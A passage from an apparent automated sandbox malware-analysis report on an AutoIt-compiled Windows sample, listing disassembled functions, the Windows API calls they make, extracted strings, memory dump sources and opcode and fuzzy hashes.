                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Internet$OpenOption
                            • String ID: <local>
                            • API String ID: 942729171-4266983199
                            • Opcode ID: 6a13a8d79fc99f883c390223e2aff39b73791bb7e28a8ebc0dba5eedffb5786c
                            • Instruction ID: b97e82af3b84b7ac5ecadb3c125948da16de9344fb81e71d7a73c5aabe26a42d
                            • Opcode Fuzzy Hash: 6a13a8d79fc99f883c390223e2aff39b73791bb7e28a8ebc0dba5eedffb5786c
                            • Instruction Fuzzy Hash: 5A119E70141B21BADB258F518C84EEABAA8EF1675BF10822BF94556240E7B069C0C6F2
                            Function 000DACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                            Download Yara Rule
                            APIs
                            • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000DACF5
                            • htons.WSOCK32(00000000,?,00000000), ref: 000DAD32
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: htonsinet_addr
                            • String ID: 255.255.255.255
                            • API String ID: 3832099526-2422070025
                            • Opcode ID: 3b797dc1d9244e2f586edd04d52b5293f75db445efd34c209a847b2287a7a60b
                            • Instruction ID: 6893fcd610f4f6c92eead82118878caa6b527863dea27c3b300574828ac41920
                            • Opcode Fuzzy Hash: 3b797dc1d9244e2f586edd04d52b5293f75db445efd34c209a847b2287a7a60b
                            • Instruction Fuzzy Hash: CA01C034200305ABCB20AFA4D846FEDB3A5EF0A725F10852BF5169B7D2D671E800C766
                            Function 000BC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000BC5E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1456604079-1403004172
                            • Opcode ID: 8f7bbe353a925f3f8096c11f4d83d84a31a2b83a52b2153027454adf3a7e0ef3
                            • Instruction ID: 4e90ce2957de4377159fe27a304bc30c36735c86471ecc95eedd895e3cb9748f
                            • Opcode Fuzzy Hash: 8f7bbe353a925f3f8096c11f4d83d84a31a2b83a52b2153027454adf3a7e0ef3
                            • Instruction Fuzzy Hash: 4201D471601518AFEB18FBA4CC52CFE73B9BF46310B140A29F4A3E72D2DB3069499760
                            Function 000CC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            • Opcode ID: b5db6dcc91f493710f2db8ec72cb6398ceaa7930c878c5685e1939370c40bbf8
                            • Instruction ID: b9df6e66d8bc0b7eb82ab836067f246db3ac495895a992f32e8c2463a99e70be
                            • Opcode Fuzzy Hash: b5db6dcc91f493710f2db8ec72cb6398ceaa7930c878c5685e1939370c40bbf8
                            • Instruction Fuzzy Hash: 6501F572900218AEEB28C7A8C816FFEBBF89B05311F00415EE197D2182E5B4E708CB60
                            Function 000BC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 000BC4E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1456604079-1403004172
                            • Opcode ID: 9e2abdce39e6fcc7d61ecb00865c0cd056a3873067e2e4054d6063d6c76b7bcd
                            • Instruction ID: 6bd7e020dea5b834a0a23395f7998b7c7698d0304dac33140ad367ae1a021de3
                            • Opcode Fuzzy Hash: 9e2abdce39e6fcc7d61ecb00865c0cd056a3873067e2e4054d6063d6c76b7bcd
                            • Instruction Fuzzy Hash: B9014F716411086BEB18FBA4CD62EFF73A9AB45701F140029F543E35D2DB645F0997B1
                            Function 000BC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 000BC562
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1456604079-1403004172
                            • Opcode ID: 6afe021defabf68bb54bdb500c6120505e7ea127106def7579f7db26043c1273
                            • Instruction ID: 5d7ec9bbdd17348d44373512b1f404a7923622f7e14d2fcb8f4300a0bb4c5a40
                            • Opcode Fuzzy Hash: 6afe021defabf68bb54bdb500c6120505e7ea127106def7579f7db26043c1273
                            • Instruction Fuzzy Hash: EE01AD71A415086BEB24FBA4CD52EFF73A8AB11701F140025F443E31C2DA64AF49A7B1
                            Function 000C804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp
                            • String ID: #32770
                            • API String ID: 2292705959-463685578
                            • Opcode ID: 6f1ee3f6a727200822859ad26224cbfe8014d49de720623e29bcb96bab48ae58
                            • Instruction ID: c5e95d98b74b8265218815173165cb159cff27ccd4434a2b3e9df493689f008e
                            • Opcode Fuzzy Hash: 6f1ee3f6a727200822859ad26224cbfe8014d49de720623e29bcb96bab48ae58
                            • Instruction Fuzzy Hash: D9E0D13750422527D720DB959C06FD7F7ACE751764F000026F564D3041D770978587D4
                            Function 000BB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000BB36B
                              • Part of subcall function 000A2011: _doexit.LIBCMT ref: 000A201B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Message_doexit
                            • String ID: AutoIt$Error allocating memory.
                            • API String ID: 1993061046-4017498283
                            • Opcode ID: ddc821629fd08fc4148192ac36bf0bea03bd0910264bbfcc9ca625e02857b970
                            • Instruction ID: 4249d3867b4d477b38f9de1f85e2891f3b38f453a4e9cb544d550f307a165504
                            • Opcode Fuzzy Hash: ddc821629fd08fc4148192ac36bf0bea03bd0910264bbfcc9ca625e02857b970
                            • Instruction Fuzzy Hash: 2DD0123128832833D21532D87C07FC576884F06B51F114025BF48565C38AE295D04299
                            Function 000FBC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • GetSystemDirectoryW.KERNEL32(?), ref: 000FBAB8
                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 000FBCAB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: DirectoryFreeLibrarySystem
                            • String ID: WIN_XPe
                            • API String ID: 510247158-3257408948
                            • Opcode ID: 0a9d7dd185395f5e634fda127496f7cfb89180f25c3213a3fadd7a17d321306b
                            • Instruction ID: d72f2d558b14fc8f585719eda72247ef37b666b1043d0c7ee89deab0024f513b
                            • Opcode Fuzzy Hash: 0a9d7dd185395f5e634fda127496f7cfb89180f25c3213a3fadd7a17d321306b
                            • Instruction Fuzzy Hash: 9DE0ED70C0414DEFCB25DBA8DC45AECB7B8BF48300F54C496E222B2551C7719A84EF22
                            Function 000E8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000E849F
                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000E84B2
                              • Part of subcall function 000C8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C83CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: e7c4810d25a050fe3116d8b85a37ef2ccfecab9b18d5afaf836fcf071d5979b7
                            • Instruction ID: 1ca318a46f5ff3e047770242c3757e3c11b1f4edd7188bb959fe671032e63a69
                            • Opcode Fuzzy Hash: e7c4810d25a050fe3116d8b85a37ef2ccfecab9b18d5afaf836fcf071d5979b7
                            • Instruction Fuzzy Hash: 74D01272384354BBE764A7B0AC4FFD77A54AB14B11F0509297399AA1D1CDF0B940C764
                            Function 000E84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000E84DF
                            • PostMessageW.USER32(00000000), ref: 000E84E6
                              • Part of subcall function 000C8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C83CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 92245bbc1b6cd1ca04b4daec51a9fec498cd9a723c3e07c5a8a48c005b661d9f
                            • Instruction ID: e822f00312b50939d84885c254e65333b9c6c97ee8cf54b25db6f440f9ebf874
                            • Opcode Fuzzy Hash: 92245bbc1b6cd1ca04b4daec51a9fec498cd9a723c3e07c5a8a48c005b661d9f
                            • Instruction Fuzzy Hash: BCD02272380300BBF720A3B0AC0FFC77604AB18B00F0008287389AA1C0CDF0B940C328